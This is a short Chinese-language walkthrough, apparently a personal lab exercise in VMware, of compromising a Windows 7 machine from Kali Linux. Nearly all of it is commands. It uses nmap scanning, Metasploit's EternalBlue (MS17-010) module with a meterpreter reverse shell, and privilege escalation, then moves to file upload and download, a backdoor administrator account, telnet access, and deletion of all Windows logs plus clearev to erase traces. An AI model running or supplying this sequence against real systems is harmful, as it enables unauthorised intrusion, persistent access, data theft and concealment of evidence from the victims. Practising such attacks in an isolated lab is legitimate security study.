学习在虚拟机上用Linux控制Windows7
工具:VMware Workstation、windows7镜像、kali linux 镜像
具体安装过程:百度都有的
启动并登录kali linux
打开终端
在桌面上右键选择Open in Terminal
再打开一个终端,查看自己的IP段
ifconfig
暂时就不管输入ifconfig命令的这个终端了
寻找Windows7,在另一个终端输入,要等十几秒,得到一个IP地址,我这里是192.168.133.132
nmap -T4 -O 192.168.133.0/24
找到Windows7的入口,要等几十秒
得到入口:smb-vuln-ms17-010
nmap -T4 --script vuln 192.168.133.132
启动msf数据库,可能又要等十几秒
service postgresql start
msfconsole
搜索相关模块
search ms17-010
查看模块信息
虚拟机装的Windows 7,用上面这个
info exploit/windows/smb/ms17_010_eternalblue #用于Windows 7 和 Server 2008 R2
info exploit/windows/smb/ms17_010_psexec #用于Windows XP
选择渗透模块
use exploit/windows/smb/ms17_010_eternalblue
显示配置参数
show options
设置Windows 7 的IP和显示可用有效载荷,选择常用的那个再设置
set RHOST 192.168.133.132
show payloads
set payload windows/x64/meterpreter/reverse_tcp
show options
设置shell的服务器,运行渗透模块
set LHOST 192.168.133.129
exploit
确认权限,尝试权限,查看当前目录,显示所有挂载点
getuid
getsystem
getwd
show_mount
上传文件,查看文件,下载文件
upload /root/fuck.exe
ls
download C:Kinglog.txt /root/
help
保存操作
进入cmd,创建用户,将用户加入管理员组,(删除用户)
shell
net user admin admin /add
net localgroup administrators admin /add
net user admin /del
创建远程服务
run gettelnet -e
消除痕迹
shell
del %WINDIR%\*log /a/s/q/f
exit
clearev
退出操作界面
exit
exit